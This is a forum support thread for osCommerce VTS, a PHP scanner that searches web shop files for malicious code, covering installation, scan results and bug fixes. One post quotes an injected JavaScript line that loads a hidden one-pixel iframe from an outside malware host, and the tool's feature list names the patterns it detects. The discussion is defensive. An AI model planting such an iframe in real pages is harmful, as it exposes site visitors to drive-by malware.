Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

osCommerce VTS


Guest

Recommended Posts

osCommerce VTS - Virus & Threat Scanner

Support thread

(Please be kind to me since english is not my first language) blush.gif

Welcome to osCommerce VTS. In the ever-decreasing world of Internet

security, web servers are fast becoming a target for spammers and

authors of malicious code to spread their nasties.

 

Server security is paramount, and the spread of malicious code can

be prevented by competent administrators and knowledgable web

masters. But why not be on the safe side?

 

osCommerce VTS is designed to run on your web server and scan your

public web files for malicious code. It is small, portable and

efficient, uses minimal server resources, and provides a full

report on what has been discovered.

 

This software is provided as-is, without warranty or guarantee of

any kind. Use at your own risk.

 

osCommerce VTS runs on Linux web servers (it has been known to function under

Windows), and is optimised to run on shared web hosting accounts.

 

Although osCommerce VTS may function with older versions, it remains untested

and unsuported. Therefore I recommend you have the following

installed on your server:

 

* Apache 1.3 or higher

* PHP 4.3.x or higer

 

What osCommerce VTS does:

* Scan for known *.php hacker files

* Scan for known hacker sites & IP's

* Scan for known suspicious code

* Scan all types of files on your site (Not only php files)

* Scan for open tag inside GIF image

* Scan for possible shell execution

* Scan for suspicious COOKIE references

...and more to come..

 

 

The contribution can be found at:

osCommerce VTS

Link to comment
Share on other sites

Forgive my limited experience...

 

Just need a little clarification of instructions.

 

* Edit config.php to your needs......What would my needs be?IS some modification needed?

 

* CHMOD all files 755 or lower.......What does CHMOD mean?

 

* - add above:

<!--osCommerce Virus & Threat Scan -->

<?php

echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan';

?>

<!--osCommerce Virus & Threat Scan -->

 

................Add this above the first </td> ?

 

Thanks,

~*Beth

Link to comment
Share on other sites

Having trouble pinpointing it. This is my header.php. So where do I add the code?

Thanks so much. Appreciate it!

 

<?php

/*

$Id: header.php 3 2006-05-27 04:59:07Z user $

 

osCMax Power E-Commerce

http://oscdox.com

 

Copyright 2006 osCMax2005 osCMax, 2002 osCommerce

 

Released under the GNU General Public License

*/

 

if ($messageStack->size > 0) {

echo $messageStack->output();

}

?>

<table border="0" width="100%" cellspacing="0" cellpadding="0">

<tr>

<td><?php echo '<a href="http://www.oscmax.com">''>http://www.oscmax.com">' . tep_image(DIR_WS_IMAGES . 'oscmax-logo.png', 'osCMax v2.0', '85', '80') . '</a>'; ?></td>

<td align="right"><?php echo '<a href="http://www.oscmax.com/" target="_blank">' . tep_image(DIR_WS_IMAGES . 'header_support.gif', HEADER_TITLE_SUPPORT_SITE, '50', '50') . '</a>  <a href="' . tep_catalog_href_link() . '">' . tep_image(DIR_WS_IMAGES . 'header_checkout.gif', HEADER_TITLE_ONLINE_CATALOG, '53', '50') . '</a>  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '">' . tep_image(DIR_WS_IMAGES . 'header_administration.gif', HEADER_TITLE_ADMINISTRATION, '50', '50') . '</a>'; ?>  </td>

</tr>

<tr class="headerBar">

<?php /* BOF: MOD - Admin Security */ ?>

<?php /* old- <td class="headerBarContent">  <?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; ?></td> */ ?>

<?php /* old- <td class="headerBarContent" align="right"><?php echo '<a href="http://www.oscmax.com" class="headerLink">' . HEADER_TITLE_SUPPORT_SITE . '</a>  |  <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a>  |  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?>  </td> */ ?>

<td class="headerBarContent">  

<?php

if (tep_session_is_registered('login_id')) {

echo '<a href="' . tep_href_link(FILENAME_ADMIN_ACCOUNT, '', 'SSL') . '" class="headerLink">' . HEADER_TITLE_ACCOUNT . '</a> | <a href="' . tep_href_link(FILENAME_LOGOFF, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_LOGOFF . '</a>';

} else {

echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>';

}

?></td>

<td class="headerBarContent" align="right"><?php echo '  <a href="https://www.oscmax.com/" target="_blank" class="headerLink">osCMax.com</a>  |  <a href="http://shop.oscmax.com" class="headerLink">' . HEADER_TITLE_OSCDOX . '</a>  |   <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a>  |  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?>  </td>

<?php /* EOF: MOD - Admin Security */ ?>

 

</tr>

</table>

Link to comment
Share on other sites

Forgive my limited experience...

 

Just need a little clarification of instructions.

 

* Edit config.php to your needs......What would my needs be?IS some modification needed?

 

e.g. You can configure the program where you want it to start scan:

$CONFIG['scanpath'] = $_SERVER['DOCUMENT_ROOT'];

or

$CONFIG['scanpath'] = $_SERVER['DOCUMENT_ROOT']."/catalog";

 

* CHMOD all files 755 or lower.......What does CHMOD mean?

You have to set file permission to 755 or lower

 

* - add above:

<!--osCommerce Virus & Threat Scan -->

<?php

echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan';

?>

<!--osCommerce Virus & Threat Scan -->

 

................Add this above the first </td> ?

See my reply on your next message..

Link to comment
Share on other sites

Having trouble pinpointing it. This is my header.php. So where do I add the code?

Thanks so much. Appreciate it!

 

Here is your updated header.php file. I have inserted the code for osCommerce VTS in it:

<?php
/*
$Id: header.php 3 2006-05-27 04:59:07Z user $

 osCMax Power E-Commerce
 [url="http://oscdox.com"]http://oscdox.com[/url]

 Copyright 2006 osCMax2005 osCMax, 2002 osCommerce

 Released under the GNU General Public License
*/

 if ($messageStack->size > 0) {
   echo $messageStack->output();
 }
?>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
 <tr>
   <td><?php echo '<a href="http://www.oscmax.com">' . tep_image(DIR_WS_IMAGES . 'oscmax-logo.png', 'osCMax v2.0', '85', '80') . '</a>'; ?></td>
   <td align="right"><?php echo '<a href="http://www.oscmax.com/" target="_blank">' . tep_image(DIR_WS_IMAGES . 'header_support.gif', HEADER_TITLE_SUPPORT_SITE, '50', '50') . '</a>  <a href="' . tep_catalog_href_link() . '">' . tep_image(DIR_WS_IMAGES . 'header_checkout.gif', HEADER_TITLE_ONLINE_CATALOG, '53', '50') . '</a>  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '">' . tep_image(DIR_WS_IMAGES . 'header_administration.gif', HEADER_TITLE_ADMINISTRATION, '50', '50') . '</a>'; ?>  </td>
 </tr>
 <tr class="headerBar">
<?php /* BOF: MOD - Admin Security */ ?>
<?php /* old- <td class="headerBarContent">  <?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; ?></td> */ ?>
<?php /* old- <td class="headerBarContent" align="right"><?php echo '<a href="http://www.oscmax.com" class="headerLink">' . HEADER_TITLE_SUPPORT_SITE . '</a>  |  <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a>  |  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?>  </td> */ ?>
   <td class="headerBarContent">  
<?php
 if (tep_session_is_registered('login_id')) {
   echo '<a href="' . tep_href_link(FILENAME_ADMIN_ACCOUNT, '', 'SSL') . '" class="headerLink">' . HEADER_TITLE_ACCOUNT . '</a> | <a href="' . tep_href_link(FILENAME_LOGOFF, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_LOGOFF . '</a>';
 } else {
   echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>';
 }
   ?>
<!--osCommerce Virus & Threat Scan -->
<?php
echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan'; 
?>
<!--osCommerce Virus & Threat Scan -->
</td>
   <td class="headerBarContent" align="right"><?php echo '  <a href="https://www.oscmax.com/" target="_blank" class="headerLink">osCMax.com</a>  |  <a href="http://shop.oscmax.com" class="headerLink">' . HEADER_TITLE_OSCDOX . '</a>  |   <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a>  |  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?>  </td>
<?php /* EOF: MOD - Admin Security */ ?>

 </tr>
</table>

 

Hope this help.

Remeber to BACKUP before you do any changes on your site!

Link to comment
Share on other sites

salve,

 

it is a problem one of this message?

 

public_html/magazin/admin/includes/functions/general.php...SUSPECTED (shell execution)

public_html/blog/wp-content/themes/gothamnews/footer.php...SUSPECTED (eval/base64_decode found)

public_html/magazinoriginal/includes/classes/recent_history.php (Traversal Exploit <=> cp( )

public_html/blog/wp-admin/plugin-editor.php (Known automated hack <=> iframe)

public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chown( )

public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chgrp( )

public_html/blog/wp-includes/http.php (Known automated hack <=> error_reporting(0) )

 

Thanks

Edited by danut82
Link to comment
Share on other sites

salve,

 

it is a problem one of this message?

 

public_html/magazin/admin/includes/functions/general.php...SUSPECTED (shell execution)

 

I have the same report for this file, no problem.

But to be sure, compare it with the original one.

 

public_html/blog/wp-content/themes/gothamnews/footer.php...SUSPECTED (eval/base64_decode found)

public_html/magazinoriginal/includes/classes/recent_history.php (Traversal Exploit <=> cp( )

public_html/blog/wp-admin/plugin-editor.php (Known automated hack <=> iframe)

public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chown( )

public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chgrp( )

public_html/blog/wp-includes/http.php (Known automated hack <=> error_reporting(0) )

 

These files I dont know since it is a contribution I dont use.

You should compare these files with the original ones to see if there is any changes that sould not be in them.

Link to comment
Share on other sites

  • 3 weeks later...

Somebody injected one of out java scripts with the code bellow, and is not been detected.

 

var jquery = '<iframe height=1 width=1 border=0 src="http://

melopp.biz/fol/?606717496665bcba"> </iframe>';

 

oooops blush.gif A small checking is missing in the code that cause the scanner to NOT scan files with 2, 4 or 5 letter extention.

I have fixed this and will UL a new version today.

Thanks for pointing this out for me!

Link to comment
Share on other sites

  • 2 weeks later...

A new version is now made available : osCommerce VTS 1.0.5

 

Whats new:

* Added check for leading & trailing whitespace in .php files

 

I added this check because of all the problems people out there have with leading and trailing whitespace.

As Spook said:

"very common issue after editing with the likes of filemanager, to add confusion, spaces at the end do not always cause issues at first, but issues can randomly occur later, maybe just through re-uploading the same file!! "

 

Link to comment
Share on other sites

Thanks for this contribution, I'll install it soon.

 

Just a quick question with regards to your newest scan for whitespace in php files,

is it possible for you to include the option to delete these trailing whitespaces?

 

I'm sure this would be useful for many people especially after having had code injected into all php files (which is what recently happened to me and who knows how many others using Godaddy LOL).

 

Thanks.

Link to comment
Share on other sites

Thanks for this contribution, I'll install it soon.

Just a quick question with regards to your newest scan for whitespace in php files,

is it possible for you to include the option to delete these trailing whitespaces?

I'm sure this would be useful for many people especially after having had code injected into all php files (which is what recently happened to me and who knows how many others using Godaddy LOL).

 

I have implemented that for the next version, but I need to do some more testing of it..

Link to comment
Share on other sites

Great, looking forward to it.

 

I have another question/suggestion (you can read more about it here) http://www.oscommerce.com/forums/topic/358244-php-self/

with regards to PHP_SELF in code, can cause problems.

 

For interest sake I searched for this term in my Oscommerce files and it appears several hundred times.

 

What are your comments on this? (I'm not a coder hence the question).

Link to comment
Share on other sites

Great, looking forward to it.

I have another question/suggestion (you can read more about it here) http://forums.oscomm...58244-php-self/

with regards to PHP_SELF in code, can cause problems.

For interest sake I searched for this term in my Oscommerce files and it appears several hundred times.

What are your comments on this? (I'm not a coder hence the question).

 

I havent studied php_self much, but yes, it can cause problems like Cross Site Scripting (XSS).

And yes, php_self is used alot in osCommerce. I am not an expert on this, but what is said about this is:

"Every PHP_SELF should be converted to HTML entities, with a function like htmlentities"

 

There is contributions for osCommerce that prevents XSS

If you have not allready done it, then read How to secure your site

Link to comment
Share on other sites

  • 2 weeks later...

A New version has been uploaded.

 

Whats new:

* Added new file for handling whitespace configuration (whitespace.php)

* Added choice for removing leading and trailing whitespace

 

REMEMBER BACKUP!!

================

Link to comment
Share on other sites

  • 3 months later...

======== On ocVTS.php ========

 

ABOVE the results, I get THOUSANDS of the following error:

 

Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143

 

I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?

 

BELOW the results, it tells me that I should rename my admin directory. I did that prior to installing VTS, so I'm not sure why it says that.

 

======== On ocVTSa.php ========

 

No notices/errors other than the actual results, just 19 counts of (shell execution) that I need to inspect against original files.

 

-------------------------

 

Aside: I never used any version prior to 1.0.6, and yet index.php tells me "New version available: v1.0.5"

Edited by hetmana
Link to comment
Share on other sites

======== On ocVTS.php ========

 

ABOVE the results, I get THOUSANDS of the following error:

 

Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143

Fixed in next release.. sorry..

 

I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?

This I dont know, could you post here the listing from ocVTS please?

 

BELOW the results, it tells me that I should rename my admin directory. I did that prior to installing VTS, so I'm not sure why it says that.

It is looking for any case of a admin dir. If you have other utils installed that have a admin dir, then ocVTS will report that..

 

Aside: I never used any version prior to 1.0.6, and yet index.php tells me "New version available: v1.0.5"

This was a litle miss. blush.gif Is fixed now..

Link to comment
Share on other sites

Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143

 

I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?

This I dont know, could you post here the listing from ocVTS please?

Line 143 is the line that is specifically looking for file_manager.php.

 

I assume that's what you mention fixing in the next release (?)

 

Thanks for jumping on this so quickly -- MUCH appreciated!! B)

Link to comment
Share on other sites

Line 143 is the line that is specifically looking for file_manager.php.

 

I assume that's what you mention fixing in the next release (?)

flagThreat is a variable that flag all threats, not specific to file_manager.php

Just to be sure, did you get this line listed:

You should delete file_manager.php from your admin folder !

Link to comment
Share on other sites

A new version released today.

 

Whats new:

* Implemented a grep function where you can search your site for your own keywords

* Fixed a undefined variable bug

* Fixed ocVTS to check for only osCommerce's renamed admin dir

 

Have fun! thumbsup.gif

Link to comment
Share on other sites

i can't connect

 

Warning: ftp_login() [function.ftp-login]: Login incorrect in /public_html/catalog/admin/AV/ocVTS.php on line 233

 

Fatal error: Call to undefined function: ftp_chmod() in /public_html/catalog/admin/AV/ocVTS.php on line 234

 

Where is issue? Thanks

 

Did you fill in these in whitespace.php :

$ftp_site = 'yoursite.com';  	// your ftp site
$ftp_usr = 'username';    	// your ftp username
$ftp_pwd = 'password'; 	// your ftp password
$ftp_root =  'public_html'; // your ftp site root folder

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...